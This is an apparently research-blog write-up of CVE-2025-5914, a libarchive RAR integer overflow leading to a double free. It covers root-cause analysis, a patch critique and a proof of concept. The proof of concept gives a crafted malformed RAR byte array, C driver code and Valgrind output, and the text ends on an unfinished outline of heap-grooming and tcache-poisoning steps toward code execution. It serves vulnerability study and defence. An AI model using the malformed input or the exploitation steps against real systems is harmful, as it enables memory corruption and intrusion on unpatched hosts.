Articles & Research Notes

CVE-2025-5914: From Integer Overflow to Ownership Confusion in libarchive RAR Parsing

In this write-up, we present a deep-dive analysis of CVE-2025-5914, a critical vulnerability in libarchive originating from an integer overflow during RAR archive parsing. We will explore how a malformed header can induce a corrupted internal state, leading to a Double Free primitive. Beyond the initial crash, we will examine the library's memory management invariants and discuss the feasibility of transitioning this flaw into a more potent exploitation primitive.

Executive Summary:

CVE-2025-5914 represents a critical Integer Overflow within the RAR parsing module of libarchive, specifically during the calculation of seek offsets for compressed data blocks. The vulnerability is triggered when the parser processes a malformed FILE_HEAD with an oversized Pack Size field.

The root cause lies in an unchecked arithmetic addition used to determine the next header's position. This overflow results in an anomalous offset, which the internal RAR handler interprets as a non-recoverable memory or file-system error. In response, the RAR parser's error-handling path prematurely deallocates its internal state structures to prevent further corruption.

However, the library's global state machine does not immediately synchronize this deallocation. Consequently, when the calling application invokes the standard API cleanup function, archive_read_finish(), the library attempts to free the same internal structures a second time. This Ownership Confusion—where both the format-specific parser and the core API claim responsibility for the same memory lifecycle—manifests as a Double Free primitive, potentially allowing for heap grooming and arbitrary code execution.

Introduction

libarchive is a high-performance, multi-format archive handling library that serves as a core component in numerous operating systems, package managers (such as pacman), command-line tools (such as bsdtar), and file explorers. Its ubiquity makes it a highly attractive target for security research, as a vulnerability within its parsing logic can often be reached remotely through automated file processing services or browser-initiated downloads.

Historically, archive parsers have been a fertile ground for memory corruption bugs due to the inherent complexity of legacy formats and the necessity of manual memory management in C. RAR, in particular, is a complex format that requires the library to maintain a sophisticated internal state machine to track headers, compression dictionaries, and seek offsets.

In this analysis, we examine a specific failure in the RAR parsing implementation of version 2.8.3. We will demonstrate how an Integer Overflow in the offset calculation logic violates the library's internal memory safety invariants. This failure does not merely cause a controlled exit; instead, it creates an Ownership Mismatch between the format-specific parser and the core orchestration layer, leading to a Double Free condition. By dissecting this vulnerability, we aim to showcase the risks associated with "Error-path Cleanup" inconsistencies in complex C-based libraries.

Basic Concepts

1 - Arithmetic Overflow (Integer Wrapping)

At the architectural level, integer variables have a finite width (e.g., 32-bit or 64-bit). An Arithmetic Overflow occurs when the result of a mathematical operation exceeds the maximum value representable in that width. In C-based libraries like libarchive, this typically involves size_t or off_t values used for memory allocation or file seeking. In C, unsigned arithmetic (size_t, uint32_t) is defined to wrap modulo 2^N, while signed overflow (off_t, int64_t) is undefined behavior that, on two's complement hardware, usually wraps in practice. Either way the result is a "wrap-around" effect: adding a positive value to a large positive integer can yield a small value or, for a signed type, a negative one (the Sign Bit becomes set). In our case, the parser performs a pointer/offset addition:

New Offset = Current Position + Block Size

If Block Size is maliciously crafted to be a near-maximum value (e.g., 0xFFFFFFFF), the resulting New Offset wraps around to a value smaller than Current Position: for a 32-bit unsigned type, Current Position + 0xFFFFFFFF equals Current Position - 1 (mod 2^32). From a security perspective, this wrap-around is not a crash in itself, but a Logic Corruption primitive. The library's boundary checks, which expect New Offset to always be greater than Current Position, are bypassed or misinterpreted. In libarchive, this specific calculation error signals a "Corrupted Archive" state to the internal RAR parser, forcing it into an emergency cleanup path, the first stage of our Double Free chain.
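The wrap-around can be reproduced in a few lines of C. This is a minimal sketch, not libarchive code: naive_next_offset() and checked_next_offset() are hypothetical helpers, and we assume a 32-bit unsigned offset purely to make the modular arithmetic visible. The checked variant rejects the addition before it happens, which is the usual way to guard a + b against unsigned overflow.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical: the naive offset arithmetic described above. On a
   32-bit unsigned type the sum silently wraps modulo 2^32. */
static uint32_t naive_next_offset(uint32_t current, uint32_t block_size)
{
    return current + block_size;
}

/* Hypothetical checked variant: refuse the addition if it would wrap.
   Returns false (and leaves *out untouched) on overflow. */
static bool checked_next_offset(uint32_t current, uint32_t block_size,
                                uint32_t *out)
{
    assert(out != NULL);
    if (block_size > UINT32_MAX - current)
        return false;            /* current + block_size would exceed 2^32 - 1 */
    *out = current + block_size;
    return true;
}
```

With Current Position = 0x100, naive_next_offset(0x100, 0xFFFFFFFF) returns 0xFF (Current Position - 1), while checked_next_offset() refuses the same inputs.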

2 - RAR File Format Architecture (Header Chaining & Seek Logic)

The RAR format is a block-oriented file structure where data is organized into a series of discrete headers, each describing a specific component of the archive (e.g., MARK_HEAD, MAIN_HEAD, FILE_HEAD). These headers are designed to be processed sequentially, forming a Linked-Chain Architecture. Each header contains a critical field known as the Head Size (and, for file blocks, the Pack Size). The parser uses these values to calculate the offset of the subsequent header in the stream. This mechanism is fundamental to the library's "Skip" or "Seek" logic:

Next Header Offset = Current Offset + Header Size + Pack Size

From a security analysis perspective, the RAR parser implementation in libarchive relies on a Trust Assumption: it assumes that the arithmetic sum of these fields will always reside within the valid bounds of the allocated buffer. In a malicious scenario, an attacker can manipulate the Pack Size field in a FILE_HEAD block. If the parser fails to perform Strict Bounds Checking before the addition, an Integer Overflow occurs. This does not just point to a wrong memory address; it violates the parser's internal state, leading it to conclude that the archive is malformed. The critical failure in version 2.8.3 is how the library synchronizes this "malformed state" with its memory deallocation logic, transitioning a simple parsing error into a state of Ownership Confusion.
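The missing Strict Bounds Checking can be sketched as a validator for the chaining formula. This is an illustrative sketch under stated assumptions: next_header_offset() is a hypothetical function, not the libarchive implementation, and offsets are modeled as int64_t. Instead of computing the sum and checking it afterwards, the function subtracts from the remaining archive length, so no intermediate value can overflow.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical validator for:
   next = current + head_size + pack_size
   The header is accepted only if the whole block fits inside the
   archive, i.e. next <= archive_size. No addition is performed until
   the bounds are proven, so nothing can wrap. */
static bool next_header_offset(int64_t current, uint16_t head_size,
                               uint64_t pack_size, int64_t archive_size,
                               int64_t *next)
{
    assert(next != NULL);
    if (current < 0 || archive_size < 0 || current > archive_size)
        return false;
    int64_t remaining = archive_size - current;   /* cannot overflow */
    if ((int64_t)head_size > remaining)
        return false;                              /* header runs past the end */
    remaining -= head_size;
    if (pack_size > (uint64_t)remaining)
        return false;                              /* data block runs past the end */
    *next = current + head_size + (int64_t)pack_size;
    return true;
}
```

Plugging in the numbers from the annotated PoC layout below (FILE_HEAD at offset 14, Head Size 31, Pack Size 0x7FFFFFFF, 47-byte buffer), the function returns false instead of producing an out-of-range offset.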
Representation of the RAR file used in the PoC:

const unsigned char RAR_SIG[] =
{
 /* --- MARK_HEAD (7 bytes) --- */
 0x52, 0x61, 0x72, 0x21, 0x1a, 0x07, 0x00,
 /* --- MAIN_HEAD (Archive configuration) --- */
 0xe6, 0xd5, // Correct Header CRC (Calculated for 2.8.3)
 0x73, // Block Type: MAIN_HEAD
 0x00, 0x00, // Flags
 0x0d, 0x00, // Head Size (13 bytes)
 /* --- FILE_HEAD (The Vulnerable Target Block) --- */
 0x30, 0x19, // Valid CRC: Ensures the parser accepts the block
 0x74, // Block Type: FILE_HEAD
 0x00, 0x90, // Flags: 0x9000 = HD_ADD_SIZE_PRESENT (0x8000) | FHD_EXTTIME (0x1000)
 0x1f, 0x00, // Head Size
 /* The Trigger: Pack Size = 0x7FFFFFFF (INT_MAX)
 When added to the current offset, this causes the integer overflow
 leading to the anomalous state. */
 0xff, 0xff, 0xff, 0x7f,
 /* --- Remaining FILE_HEAD Metadata --- */
 0x00, 0x00, 0x00, 0x00, // Unpacked Size
 0x03, // OS: MS-DOS
 0x00, 0x00, 0x00, 0x00, // File CRC
 0x00, 0x00, 0x00, 0x00, // Date
 0x14, // Version
 0x30, // Method: Store
 0x01, 0x00, // Name Size: 1 byte ('A')
 0x00, 0x00, 0x00, 0x00, // Attributes
 0x41 // Filename: 'A'
};    
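To double-check the annotations, the FILE_HEAD fields can be decoded directly from the bytes. RAR 4.x stores multi-byte header fields in little-endian order. decode_file_head() and struct file_head_view are hypothetical names used only for this sketch, which reads the 7-byte base header (CRC, type, flags, head size) followed by the 4-byte Pack Size.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Little-endian field readers (RAR 4.x header byte order). */
static uint16_t le16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical view of the leading FILE_HEAD fields. */
struct file_head_view {
    uint8_t  type;       /* 0x74 for FILE_HEAD */
    uint16_t flags;
    uint16_t head_size;
    uint32_t pack_size;
};

/* Decode the header starting at `off`: CRC16 (2), type (1), flags (2),
   head size (2), then PACK_SIZE (4). Returns -1 if bytes are missing. */
static int decode_file_head(const unsigned char *buf, size_t len, size_t off,
                            struct file_head_view *out)
{
    assert(buf != NULL && out != NULL);
    if (off > len || len - off < 11)
        return -1;
    out->type      = buf[off + 2];
    out->flags     = le16(buf + off + 3);
    out->head_size = le16(buf + off + 5);
    out->pack_size = le32(buf + off + 7);
    return 0;
}
```

Called as decode_file_head(RAR_SIG, sizeof(RAR_SIG), 14, &v), i.e. at offset 14 where the annotated FILE_HEAD begins (7 MARK_HEAD bytes plus the 7 MAIN_HEAD bytes present in the array), it yields type 0x74, flags 0x9000, Head Size 31, and Pack Size 0x7FFFFFFF.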

The RAR image is then copied into a heap-allocated buffer:

uint8_t *buf = malloc(sizeof(RAR_SIG)); //heap copy of the RAR image
if (buf == NULL) //allocation failed (malloc() returned NULL)
{
    fprintf(stderr, "[-] Error allocating the RAR_SIG buffer!\n");
    sys_exit(); //PoC helper: clean up and exit
}
memcpy(buf, RAR_SIG, sizeof(RAR_SIG)); //copy the payload

3 - C (Heap Management) & Object Lifecycle

Memory management in C-based system libraries like libarchive relies heavily on dynamic allocation within the Heap. When a new archive object is initialized via archive_read_new(), the library allocates a contiguous block of memory to hold the struct archive_read opaque structure. This structure acts as a "Container" for various sub-objects, including format-specific handlers (like the RAR parser) and filter pipelines.

The core security invariant in heap management is Determined Ownership: for every allocated block, there must be exactly one clear owner responsible for its deallocation. In complex libraries, this ownership is often passed between layers:

  • The Orchestration Layer (Core API): Manages the global lifecycle of the archive handle.
  • The Format Layer (RAR Parser): Manages internal buffers and state-specific structures.

A breakdown in this logic leads to two primary exploitation primitives:

  • Double Free: Occurs when the same heap address is passed to the free() allocator twice. This corrupts the heap's internal metadata (such as the next pointers in fastbins or tcache), potentially allowing an attacker to overwrite arbitrary memory locations.
  • Use-After-Free (UAF): Occurs when a layer continues to use a pointer to a heap block that has already been deallocated.

In the context of CVE-2025-5914, the vulnerability is not a simple double-call to free(), but a Synchronization Failure between these layers. The RAR layer deallocates its state due to the Integer Overflow (error-path), but the Core API—unaware of this state change—attempts a redundant cleanup, leading to the violation of heap integrity.
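The Determined Ownership rule is commonly enforced with a "free and null through the owning slot" idiom. The sketch below uses a hypothetical two-layer layout. struct core_handle, struct format_state and the helper names are ours, not libarchive's. Because the release function takes a pointer to the owner's pointer, whichever layer runs first clears the shared slot, and any later cleanup becomes a harmless no-op.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical layout: the core object holds the only pointer to the
   format-private state, which itself owns a buffer. */
struct format_state { unsigned char *window; };
struct core_handle  { struct format_state *format_data; };

/* Release through the owning slot and clear it, so a second cleanup
   sees NULL and returns immediately. */
static void format_state_release(struct format_state **slot)
{
    assert(slot != NULL);
    if (*slot == NULL)
        return;
    free((*slot)->window);
    free(*slot);
    *slot = NULL;
}

static int core_init(struct core_handle *h)
{
    assert(h != NULL);
    h->format_data = calloc(1, sizeof *h->format_data);
    if (h->format_data == NULL)
        return -1;
    h->format_data->window = malloc(64);
    if (h->format_data->window == NULL) {
        format_state_release(&h->format_data);
        return -1;
    }
    return 0;
}
```

Calling format_state_release(&h.format_data) twice, once from an error path and once from the core's shutdown, releases the memory exactly once.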

4 - Library State Machine (Synchronization & Error Propagation)

Complex C libraries often operate as a Finite State Machine (FSM). In libarchive, the state machine coordinates the transition between different phases: NEW -> HEADER -> DATA -> EOF.

Each phase has strict invariants regarding which internal objects are "alive" and which layer owns their memory.
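The phase invariants can be pictured as a tiny transition function. This is a hypothetical model of the NEW -> HEADER -> DATA -> EOF flow named above, plus a sticky FATAL state. The enum and step() are ours and do not mirror libarchive's internal constants. The model shows that a fatal result is expected to move the core into a terminal state as soon as a parser reports it.

```c
#include <assert.h>

/* Hypothetical phases, plus a terminal FATAL state. */
enum phase { PH_NEW, PH_HEADER, PH_DATA, PH_EOF, PH_FATAL };

/* Hypothetical result of the operation performed in the current phase. */
enum result { R_OK, R_EOF, R_FATAL };

/* Next phase after an operation in phase `p` returns `r`. */
static enum phase step(enum phase p, enum result r)
{
    assert(p >= PH_NEW && p <= PH_FATAL);
    if (p == PH_FATAL || r == R_FATAL)
        return PH_FATAL;                          /* fatal is sticky */
    switch (p) {
    case PH_NEW:    return PH_HEADER;             /* archive opened */
    case PH_HEADER: return r == R_EOF ? PH_EOF : PH_DATA;
    case PH_DATA:   return PH_HEADER;             /* data read or skipped */
    default:        return p;                     /* PH_EOF stays at EOF */
    }
}
```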

[Figure: state machine diagram]

When a format-specific parser (like the RAR module) is active, it enters a sub-state where it manages its own internal heap-allocated structures (struct rar). The core library relies on Error Return Codes (ARCHIVE_OK, ARCHIVE_WARN, ARCHIVE_FATAL) to synchronize its global state with the parser's local state.

The vulnerability arises from a State Desynchronization during error propagation. When the Integer Overflow occurs during a seek operation, the RAR parser encounters an inconsistent state. To protect the heap, the parser follows a "fail-fast" logic:

  1. It identifies the arithmetic anomaly as a fatal corruption.
  2. It triggers an internal cleanup routine to deallocate the struct rar.
  3. It returns an error code to the orchestration layer.

[Figure: Ownership Confusion diagram]

The critical flaw in version 2.8.3 is that the Core Orchestration Layer does not transition its global state to "Deallocated" upon receiving this specific error. Instead, it maintains a Stale Pointer to the now-freed RAR structure. This mismatch creates a "Zombie State" where the library's global handle still believes it owns a resource that has already been returned to the system allocator. This internal confusion is the fundamental prerequisite for the subsequent Double Free during the final API shutdown.
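The Stale Pointer can be modeled without touching the real allocator. In this hypothetical sketch (all names are ours), a release only increments a counter, so a double release becomes observable instead of undefined. The buggy error path frees through a local copy of the pointer, the pattern that leaves the core's copy dangling, while the fixed path clears the owning slot. MODEL_FATAL reuses the numeric value of libarchive's ARCHIVE_FATAL (-30) for readability only.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_FATAL (-30)   /* numerically equal to libarchive's ARCHIVE_FATAL */

/* Instrumented stand-in for a heap object: counts its releases. */
struct tracked { int releases; };

static void tracked_release(struct tracked *t)
{
    if (t != NULL)
        t->releases++;
}

/* Core layer: holds what it believes is a live format pointer. */
struct core { struct tracked *format_data; };

/* Buggy error path: release via a local copy; the core's pointer
   is left non-NULL (stale). */
static int parser_fail_buggy(struct core *c)
{
    assert(c != NULL);
    struct tracked *rar = c->format_data;   /* local copy */
    tracked_release(rar);
    rar = NULL;                              /* clears only the copy */
    return MODEL_FATAL;
}

/* Fixed error path: release through the owning slot and clear it. */
static int parser_fail_fixed(struct core *c)
{
    assert(c != NULL);
    tracked_release(c->format_data);
    c->format_data = NULL;
    return MODEL_FATAL;
}

/* Core shutdown: releases whatever it still believes it owns. */
static void core_finish(struct core *c)
{
    assert(c != NULL);
    tracked_release(c->format_data);
    c->format_data = NULL;
}
```

Running the buggy path followed by core_finish() leaves the object with two recorded releases; the fixed path records one.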
Ownership confusion (example state machine):

/* Stage 1: The library accepts the malformed header as valid */
read_archive = archive_read_next_header(base_obj, &entryArchive);
if (read_archive == ARCHIVE_OK)
{
    /* The State Machine is now "Inconsistent".
    - Core API: State is ARCHIVE_OK.
    - Internal RAR Parser: Loaded with a 0x7FFFFFFF Pack Size.
    */
    printf("[+] Header Accepted! Triggering Integer Overflow in Seek...\n");
    /* Stage 2: Triggering the overflow via data skipping */
    archive_read_data_skip(base_obj);
}
                  

When archive_read_data_skip() is called, the library attempts to calculate the distance to the next header using the overflowed value. Within the deep nesting of the RAR module, this calculation fails, and the module self-terminates and frees its local context. However, because the call stack returns through multiple layers, the archive_read object "forgets" that its internal RAR component has already been deallocated.

5 - Callback & Fallback Mechanisms (The Abstraction Gap)

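To maintain its format-agnostic nature, libarchive uses a Callback-driven Architecture. When an application opens an archive, a set of function pointers (Callbacks) is registered, and the library invokes them whenever it needs more data: archive_read_open() takes application-supplied callbacks, while archive_read_open_memory() installs the library's own memory-backed callbacks on the application's behalf.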

The Callback Layer: The library's core does not "read" files; it asks the Callback Provider to fill a buffer. This creates a decoupled environment where the format parser (RAR) is several layers of abstraction away from the actual data source.

The Fallback Trap: In the context of CVE-2025-5914, the Fallback Mechanism refers to the library's "Error Recovery" path. When the RAR parser triggers an Integer Overflow during a seek operation, the standard data-flow is interrupted. The library then enters a "Fallback to Cleanup" mode:

  • The Parser's Local Exit: The RAR module, realizing it cannot recover from the anomalous offset, invokes its local destructor to free its context.
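The Abstraction Gap can be illustrated with a simplified callback reader. This is a hypothetical model, not libarchive's callback signature (libarchive's read callback does not take a size limit). The core pulls bytes only through read_cb, and the memory-backed client decides how many bytes each call returns. Code sitting above core_read() never sees the buffer or its bounds directly, so it depends entirely on the sizes it computes itself.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical callback: point *chunk at up to `max` bytes and return
   their count, or 0 at end of data. */
typedef ptrdiff_t (*read_cb)(void *client, const void **chunk, size_t max);

/* Client data for a memory-backed source. */
struct mem_client {
    const unsigned char *buf;
    size_t len;
    size_t pos;
    size_t block;   /* largest chunk handed out per call */
};

static ptrdiff_t mem_read(void *client, const void **chunk, size_t max)
{
    struct mem_client *mc = client;
    size_t n = mc->len - mc->pos;
    if (n > mc->block)
        n = mc->block;
    if (n > max)
        n = max;
    *chunk = mc->buf + mc->pos;
    mc->pos += n;
    return (ptrdiff_t)n;
}

/* Core side: fill dst with up to `want` bytes, pulling data only
   through the callback. A short count means the source ran dry. */
static size_t core_read(read_cb cb, void *client, unsigned char *dst,
                        size_t want)
{
    size_t got = 0;
    assert(cb != NULL && dst != NULL);
    while (got < want) {
        const void *chunk = NULL;
        ptrdiff_t n = cb(client, &chunk, want - got);
        if (n <= 0)
            break;
        memcpy(dst + got, chunk, (size_t)n);
        got += (size_t)n;
    }
    return got;
}
```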

Technical Analysis

Affected Component:

The vulnerability is rooted in the RAR format parser and its interaction with the Core Read API of libarchive. The flaw manifests during the lifecycle management of archive objects, specifically when processing memory-backed streams.

Key Functional Entry Points:

  • archive_read_open_memory() (The Initialization Vector): This function initializes the heap-based context for reading archives directly from a memory buffer. It sets up the client_data structures and the callback pointers. In the context of this vulnerability, it is responsible for allocating the initial state that will later be subject to ownership confusion.
  • archive_read_data_skip() (The Trigger): This is the core "Trigger" function. When invoked, it dispatches to the RAR format's skip handler, archive_read_format_rar_read_data_skip(). It is within this handler (and its nested calls to archive_read_format_rar_read_header) that the Integer Overflow occurs during the calculation of the next block offset. The failure here initiates the premature "first free" of the RAR state structure.
  • archive_read_finish() (The Sink): This function acts as the Vulnerability Sink. It is the standard API call used to deallocate the archive object and all its associated modules. Because the internal RAR state was already freed during the failure in archive_read_data_skip, this function attempts to deallocate the same memory address again, resulting in a Double Free condition.

Target Version & Scope:

  • Primary Target: The vulnerability has been meticulously confirmed and reproduced in libarchive version 2.8.3.
  • Broad Impact: Systematic analysis indicates that all versions of libarchive prior to 3.8.0 are potentially susceptible to this specific logic flaw in error-path cleanup, depending on the format parser's implementation.

Type of Vulnerability:

While CVE-2025-5914 is formally cataloged as an Integer Overflow (CWE-190) leading to a Double Free (CWE-415), a rigorous architectural analysis reveals that the overflow is merely the initial trigger (the Source) and not the fundamental security failure. The true vulnerability lies in a Parser-Driven Lifetime Violation and Ownership Confusion.

The Hierarchy of Failure:

  1. The Trigger (Integer Overflow): The oversized Pack Size value in the RAR header causes an arithmetic wrap-around. However, in a memory-safe environment, this should only lead to an "Invalid Archive" error and a graceful exit.
  2. The Root Cause (Ownership Mismatch): The core issue is the library's inability to maintain a single "Source of Truth" regarding the ownership of the struct rar object on the Heap. There is a clear conflict between:
    • Parser Ownership: The internal RAR module, which deallocates the object upon detecting the overflow.
    • Core Ownership: The API orchestration layer, which remains unaware of this deallocation.
  3. The Outcome (Double Free): The fact that the library follows an abort/exit flow rather than raising an immediate Segmentation Fault upon the overflow indicates that execution continues until it reaches the redundant free() call.

Proof of Concept Logic:

If the Integer Overflow were the primary issue, the impact would be limited to a logic error or an out-of-bounds read. However, because the system allows the same heap-allocated structure to be claimed (and freed) by two different layers of the library, we transition from a simple arithmetic error into a critical Memory Corruption Primitive.

As our analysis demonstrates, we are not just reading "random data"; we are exploiting a Synchronization Gap in memory management. The library's failure to nullify the stale pointer after the first free() in the error-path is the definitive proof of a Lifetime Violation.

Proof of Concept (PoC)

The goal of this PoC is to demonstrate the Double Free condition by forcing the library into an inconsistent state. The PoC targets the interaction between the memory-backed reader and the RAR format handler.

1. Payload Construction:

The exploit begins with a carefully crafted RAR byte stream. The critical part is the FILE_HEAD block, where we set the Pack Size to a value that will cause a wrap-around when added to the current stream offset.

// Malformed Pack Size: 0x7FFFFFFF
// Calculation: Current_Offset + 0x7FFFFFFF = Integer Overflow
0xff, 0xff, 0xff, 0x7f,

2. Execution Flow & Detection:

We use a driver program that utilizes the libarchive API. The execution follows this deterministic path:
Initialization: archive_read_open_memory() maps our malicious buffer.



archive_memory = archive_read_open_memory
(
    base_obj,       //base archive object
    buf,            //heap buffer (malloc())
    sizeof(RAR_SIG) //buffer size
);

//check the result of the open call
if (archive_memory == ARCHIVE_FATAL)
{
    fprintf(stderr, "[-] archive_read_open_memory() : Error link buffer (ARCHIVE_FATAL) !\n");
    fprintf(stderr, "%s\n", archive_error_string(base_obj));
    sys_exit(); //PoC helper: clean up and exit
}

Trigger: A call to archive_read_data_skip() forces the RAR parser to process the overflowed Pack Size.

if (read_archive == ARCHIVE_OK)
{
    printf("[+] Header Accepted! Triggering Integer Overflow in Seek...\n");
    archive_read_data_skip(base_obj); //Overflow Pack Size
}
                   

First Free: Internal logs and debuggers (like Valgrind) show a free() call originating from archive_read_format_rar_read_data_skip.

The Crash (Sink): Upon calling archive_read_finish(), the second free() is attempted on the same pointer, leading to an immediate abort by the glibc heap protector.


int core_free = archive_read_finish(base_obj); //core ownership: frees the base struct (double free)
if (core_free == ARCHIVE_OK)
{
    printf("[+] Core Ownership : Free Base struct (double free).\n"); //PoC reached the sink
}
else
{
    printf("[-] Core Ownership : Error free base struct (Not double free) !\n");
}

Running the PoC:

This PoC was run on a REMnux Linux system (6.10.14, x86_64).

* Compiling the source file:


gcc poc.c -o INTEGER_OVERFLOW \
-I./libarchive \
-L./.libs \
-larchive \
-lz   

* Running an ELF file with Valgrind to check for memory errors:

LD_LIBRARY_PATH=./.libs valgrind --tool=memcheck ./INTEGER_OVERFLOW
                  

Trace Analysis: Valgrind flags the access inside archive_read_finish() (archive_virtual.c:63) as an invalid read of memory that has already been released.

The Log: the report states that the address lies 8 bytes inside a 1,120-byte block that was free'd before this call.

Output:


==14550== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==14550== Command: ./INTEGER_OVERFLOW
==14550==
[+] Call main function...
[+] Start RAR PARSER...
[+] Archive Memory : ---------------
[+] Size buffer : 47 (hex=2F)
------------------------------------
[+] Triggering Final Free (This should be the Double Free)...
[+] Triggering Final Free...
==14550== Invalid read of size 8
==14550== at 0x486F524: archive_read_finish (archive_virtual.c:63)
==14550== by 0x109526: func_1 ( in /home/remnux/Desktop/n-day/libarchive_int_overflow/libarchi
==14550== by 0x109587: main ( in /home/remnux/Desktop/n-day/libarchive_int_overflow/libarchive
==14550== Address 0x6fab138 is 8 bytes inside a block of size 1,120 free'd
==14550== at 0x483CA3F: free ( in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-
==14550== by 0x4857F5C: _archive_read_finish (archive_read.c:806)
                   

Full Valgrind output of the PoC run: result_poc.txt

The Logical Error (Root Cause)

The fundamental failure in CVE-2025-5914 is not merely an arithmetic overflow, but a State Synchronization Failure during an error-handling path. In robust C programming, an error should either be handled locally without side effects or propagated upwards to a layer that manages the object's lifetime. libarchive fails by doing both inconsistently.

1. The Broken Invariant:
The library operates on a design invariant where the Core Layer manages the top-level struct archive_read, while the Format Layer (RAR) manages its own internal struct rar. The logical error occurs when an unexpected event (the Integer Overflow) breaks the communication between these two layers.

2. The Premature Deallocation (The Ghost Object):
When the overflow is triggered, the RAR parser encounters a state it cannot recover from. It treats this as a Fatal Error and immediately invokes its internal destructor to free the struct rar.

The Error: The parser returns an error code, but it does not nullify the pointer held by the Core Layer.
The Result: The Core Layer now holds a Stale Pointer—a Ghost object that exists in the core's logic but has been erased from the Heap.

3. Redundant Ownership Assumption:
The Core Layer's cleanup logic in archive_read_finish() is designed to be "thorough." It iterates through all registered formats and, if it sees a non-null pointer for a format (like RAR), it assumes it still owns that memory and must free it to prevent a memory leak.

Because the RAR parser failed to communicate that it had already performed a "self-cleanup," the Core Layer proceeds with a redundant free() call. This is a classic Double Free resulting from Ownership Confusion: two different parts of the same program both believed they were the "last owner" responsible for the same memory block.

Patch Analysis

A critical part of vulnerability research is evaluating the effectiveness of the official fix. Upon reviewing the commit for CVE-2025-5914, we observed that the remediation focuses on Integer Promotion rather than Architectural Memory Safety.

1. The Surface-Level Fix

The patch modifies the struct rar handling in archive_read_support_format_rar.c by widening nodes, cursor, and the loop index i from unsigned int to size_t:

* Before the patch:


unsigned int cursor;
unsigned int nodes;
unsigned int i;

* After the patch:

size_t cursor;
size_t nodes;
size_t i;
                  

The developers' logic was that by using size_t (64-bit on LP64 platforms such as x86_64 Linux), the roughly 4-billion-node (2^32) overflow threshold becomes practically unreachable. They treated the Integer Overflow as the primary vulnerability.
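The effect of the type change can be shown with a worked example. This sketch assumes an LP64 target (32-bit unsigned int, 64-bit size_t), such as the x86_64 Linux system used for the PoC. next_uint() and next_size() are hypothetical helpers, not the patched code.

```c
#include <limits.h>
#include <stddef.h>

/* A 32-bit unsigned counter: one step past UINT_MAX wraps to 0. */
static unsigned int next_uint(unsigned int n)
{
    return n + 1u;
}

/* The same step on size_t: on LP64 it simply continues to 2^32. */
static size_t next_size(size_t n)
{
    return n + 1;
}
```

next_uint(UINT_MAX) wraps to 0, whereas next_size((size_t)UINT_MAX) returns 4294967296 on LP64. The wrap still exists for size_t, but only at 2^64.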

The Persistence of Ownership Confusion:
As our analysis demonstrated, the overflow was merely the trigger for an error-handling path. The true "Root Cause"—the Ownership Mismatch between the RAR parser and the Core API—remains unaddressed in this patch.

  • No Pointer Nullification: The patch does not ensure that the struct rar pointer is set to NULL immediately after the first free() in the error path.
  • State Blindness: The Core API still has no mechanism to verify if the format-specific data has already been deallocated by the sub-module before it attempts its own cleanup.

The "Bypass" Potential:
By focusing on the arithmetic overflow, the library remains vulnerable to any other error condition that might trigger the same premature cleanup logic. If an attacker finds a different way to induce a fatal error within the RAR parser (e.g., through corrupted Huffman tables or invalid dictionary sizes), the Double Free Primitive will still be reachable.

Conclusion of the Analysis:

The official fix is a Band-aid. It pushes the boundary of the overflow further away but leaves the Memory Corruption Logic intact. A robust fix would have required a synchronization of the library's state machine, ensuring that ownership is explicitly handed back or invalidated upon failure.
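One way to express "ownership handed back" is a single-owner design in which the format layer never frees its own state on failure. The sketch below is a hypothetical model (names and return codes are ours). On an overflow, the format layer only marks its state as failed and returns a fatal code, the core records the transition, and the core alone frees the state at shutdown. This is an alternative design, not a description of any existing libarchive patch.

```c
#include <assert.h>
#include <stdlib.h>

#define MODEL_OK     0
#define MODEL_FATAL (-30)   /* numerically equal to libarchive's ARCHIVE_FATAL */

/* Hypothetical single-owner layout: only the core ever frees fmt. */
struct fmt_state { int failed; };
struct core { struct fmt_state *fmt; int state_fatal; };

/* Format layer: on a detected overflow, poison the state and report
   back, but keep the memory alive for its real owner. */
static int fmt_skip(struct fmt_state *s, int overflow_detected)
{
    assert(s != NULL);
    if (s->failed)
        return MODEL_FATAL;          /* failure is sticky */
    if (overflow_detected) {
        s->failed = 1;
        return MODEL_FATAL;
    }
    return MODEL_OK;
}

/* Core layer: records the fatal transition in its own state. */
static int core_skip(struct core *c, int overflow_detected)
{
    assert(c != NULL);
    int r = fmt_skip(c->fmt, overflow_detected);
    if (r == MODEL_FATAL)
        c->state_fatal = 1;
    return r;
}

/* Core shutdown: the single owner frees once and clears the slot. */
static void core_free(struct core *c)
{
    assert(c != NULL);
    free(c->fmt);
    c->fmt = NULL;
}
```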

Switch n-day: Weaponizing the Ownership Conflict

The transition from a logical "Ownership Confusion" to a full Remote Code Execution (RCE) is achieved by manipulating the heap's metadata. In CVE-2025-5914, the double free isn't just a crash; it is a Primitive that allows us to redirect the allocator's internal logic.

1 - Heap Grooming / Spraying
To ensure the exploit is deterministic, we must control the heap layout. By "Spraying" the heap with objects of a similar size to struct rar, we fill the memory gaps. This ensures that when the RAR module performs its premature free(), the resulting hole is predictable and surrounded by our controlled data, preventing the allocator from merging it with other blocks (Consolidation).

2 - Overlapping Objects (The Core Exploit)
This is where the Ownership Conflict becomes fatal. Because the Core API is "blind" to the fact that the RAR module has already freed the memory, we have a Window of Opportunity.

During this window, we trigger a new allocation that "reclaims" the memory chunk formerly occupied by struct rar.

Now, we have two different pointers in the program referring to the same memory location: the Core API's stale pointer and our new object's pointer. This is an Overlapping Objects state, allowing us to leak or overwrite sensitive internal data.

3 - Fastbin Dup & Tcache Poisoning (Primitive Write-Only)
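Once we have overlapping objects, we trigger the second free() via archive_read_finish(). This induces a Double Free in the tcache or fastbins. On glibc 2.29 and later, a naive tcache double free is caught through the per-chunk key field, so the overlapping object from the previous step is also what lets us clobber that metadata before the second free():

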